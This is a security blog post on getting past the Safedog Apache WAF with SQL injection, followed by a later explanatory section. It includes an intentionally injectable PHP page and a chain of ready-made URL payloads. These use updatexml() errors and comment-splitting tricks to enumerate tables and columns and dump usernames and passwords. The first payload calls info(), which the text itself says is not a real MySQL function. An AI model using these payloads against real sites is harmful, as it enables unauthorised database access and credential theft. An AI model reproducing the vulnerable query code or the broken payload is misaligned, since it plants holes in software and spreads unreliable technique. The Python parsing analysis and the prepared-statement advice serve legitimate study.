[WAF bypass] Safedog Apache SQL injection bypass
2022-12-22 19:09:31  Author: moonsec

Hello everyone, it's me again, moonsec's senior apprentice. I've been studying hard under master moonsec for half a year now, keep at it every day, and write up a few notes along the way.

Recently, during a penetration test, I ran into an injection point on an Apache + PHP host protected by Safedog, so I rebuilt the setup locally and worked out a bypass. This is what it looks like.

Safedog version: Apache v4.0

Injection point code

<?php
// Deliberately vulnerable test page: id comes straight from the query string
// and is spliced into the SQL text, which is the injection point used below.
$conn = mysqli_connect("localhost", "root", "root", "www_test1_com");

if ($conn->connect_error) {
    die("Database connection failed: " . $conn->connect_error);
}

$conn->query('set names utf8');
$id = $_GET['id'];

// Echo the assembled query so the effect of each payload is visible in the response.
echo "select * from users where id='$id'";
echo "<br>";

// MySQL errors are returned to the client, which is what the error-based
// (exp() / updatexml()) payloads below rely on.
if (!$result = $conn->query("select * from users where id='$id'")) {
    die(mysqli_error($conn));
}

while ($row = $result->fetch_assoc()) {
    echo "<pre>";
    var_dump($row);
    echo "</pre>";
}
?>

Get the database name

http://www.test1.com/index.php?id=' and exp(~(select*from(select info() )x))or '

Note on this payload: it is the exp() overflow error-based technique, which leaks the subquery result through MySQL's "DOUBLE value is out of range" error. `info()` is not a built-in MySQL function; the usual form of the trick wraps `database()`, and it only works on MySQL builds whose error message still echoes the offending expression.

List the tables

The database name is converted to a hex literal with hex() (0x7777775F74657374315F636F6D is www_test1_com), so no quotes are needed inside the payload.

http://www.test1.com/index.php?id='union/*/!*!**/select 1,2,updatexml/*!--+/*%0A(1,concat(0x7e,(SELECT group_concat(table_name)from/*!--+/*%0Ainformation_schema.tables*/where table_schema=0x7777775F74657374315F636F6D),0x7e),1)or '

List the columns

http://www.test1.com/index.php?id=1 'union/*/!*!**/select 1,2,/*/!*!**/ updatexml/*!--+/*%0a(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='users' limit 0,1),0x7e),1)*/or%20'

updatexml() only shows the first 32 characters of the bad XPath string in its error, so a long column list is fetched in segments with SUBSTRING()

http://www.test1.com/index.php?id=1 'union/*/!*!**/select 1,2,/*/!*!**/ updatexml/*!--+/*%0a(1,concat(0x7e,(select SUBSTRING(group_concat(column_name),40,60)from information_schema.columns where table_name=0x7573657273  limit 0,1),0x7e),1)*/or%20'

Dump the table contents

http://www.test1.com/index.php?id=1 'union/*/!*!**/select 1,2,/*/!*!**/ updatexml/*!--+/*%0a(1,concat(0x7e,(select group_concat(username,0x3a,password)from users limit 0,1),0x7e),1)*/or%20'
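The table, column and data payloads above all rely on one parsing differential, which the post does not spell out. A WAF that treats everything between /* and the next */ as a comment sees `updatexml/*!--+/*%0A(1,concat(...)*/` as the bare word updatexml followed by a comment, so the function call, group_concat() and information_schema never reach its signatures. MySQL, on the other hand, executes the body of a `/*!...*/` comment as SQL; inside that body `--+` (a `-- ` line comment once the `+` is URL-decoded) swallows the stray `/*` up to the `%0A` newline, and the rest of the body is live SQL until the closing `*/`. The `/*/!*!**/` between union and select is a plain comment to MySQL. The following Python is an added example, not code from the post: it assembles the query exactly as index.php does, runs it through a hypothetical comment-stripping WAF normaliser and through an approximation of MySQL's lexer, and reports which of a small, illustrative signature list fires on each view. Safedog's real ruleset is not public; the WAF model and the signature list are assumptions, and only the table-enumeration payload from the post is used as input.

```python
import re
from urllib.parse import unquote_plus

# Table-enumeration payload copied from the post, exactly as it appears in the id= parameter.
TABLES_PAYLOAD = (
    "'union/*/!*!**/select 1,2,updatexml/*!--+/*%0A(1,concat(0x7e,"
    "(SELECT group_concat(table_name)from/*!--+/*%0Ainformation_schema.tables*/"
    "where table_schema=0x7777775F74657374315F636F6D),0x7e),1)or '"
)

# Illustrative signature list (an assumption, not Safedog's rules).
SIGNATURES = {
    "information_schema": re.compile(r"information_schema", re.I),
    "updatexml": re.compile(r"updatexml\s*\(", re.I),
    "group_concat": re.compile(r"group_concat\s*\(", re.I),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
}


def assemble_query(raw_param):
    """Do what index.php does: URL-decode id (PHP's $_GET) and splice it into the quoted literal."""
    return "select * from users where id='" + unquote_plus(raw_param) + "'"


def hex_literal(s):
    """Encode a string as a MySQL 0x... literal, the trick the post uses to avoid quotes."""
    return "0x" + s.encode().hex().upper()


def squash(s):
    return re.sub(r"\s+", " ", s).strip()


def waf_view(sql):
    """Hypothetical WAF normalisation: every /* ... */ block (shortest match) becomes a space."""
    return squash(re.sub(r"/\*.*?\*/", " ", sql, flags=re.S))


def mysql_view(sql):
    """Approximation of MySQL's lexer: /*! bodies execute, -- and # run to end of line,
    quoted strings are copied through untouched."""
    out = []
    i, n = 0, len(sql)
    in_exec_comment = False
    while i < n:
        c = sql[i]
        if sql.startswith("/*!", i):
            # Executable comment: optional 5-digit version number, then the body is real SQL.
            i += 3
            if sql[i:i + 5].isdigit():
                i += 5
            in_exec_comment = True
            out.append(" ")
        elif sql.startswith("/*", i):
            # Plain comment: skipped up to the first */ (this is how /*/!*!**/ disappears).
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif sql.startswith("*/", i) and in_exec_comment:
            in_exec_comment = False
            i += 2
            out.append(" ")
        elif c == "#" or (sql.startswith("--", i) and (i + 2 >= n or sql[i + 2] in " \t\r\n")):
            # Line comment: runs to the newline that %0A supplies, eating the stray /*.
            end = sql.find("\n", i)
            i = n if end < 0 else end + 1
            out.append(" ")
        elif c == "'":
            # String literal: copy verbatim, honouring '' and backslash escapes.
            j = i + 1
            while j < n:
                if sql[j] == "\\":
                    j += 2
                    continue
                if sql[j] == "'":
                    if j + 1 < n and sql[j + 1] == "'":
                        j += 2
                        continue
                    break
                j += 1
            out.append(sql[i:j + 1])
            i = j + 1
        else:
            out.append(c)
            i += 1
    return squash("".join(out))


def matched_signatures(view):
    """Names of the illustrative signatures that fire on a normalised view."""
    return [name for name, rx in SIGNATURES.items() if rx.search(view)]


if __name__ == "__main__":
    sql = assemble_query(TABLES_PAYLOAD)
    print("WAF sees:   ", waf_view(sql), matched_signatures(waf_view(sql)))
    print("MySQL runs: ", mysql_view(sql), matched_signatures(mysql_view(sql)))
```

On the WAF view the statement collapses to `... union select 1,2,updatexml where table_schema=0x... ),0x7e),1)or ''`, with no function call and no information_schema left to match, while the MySQL view is the clean `union select 1,2,updatexml (1,concat(0x7e,(SELECT group_concat(table_name)from information_schema.tables where ...),0x7e),1)or ''` that actually runs. The `union/*/!*!**/select` part reaches both normalisers as `union select`, so whatever let it past Safedog's union/select rule depends on that product's own comment regex, which is not modelled here. The general lesson is the usual one: a WAF that normalises input with a different grammar from the backend can always be split from it, and the durable fix is the prepared statement in index.php, not a better regex.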



Article source: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653586257&idx=1&sn=22ba426953f02000f9f93ea285b08a6a&chksm=811b9513b66c1c05e05b9d149522e5138187dd213b1f4778e54f59bb21d4f8a6e379c271a2cd#rd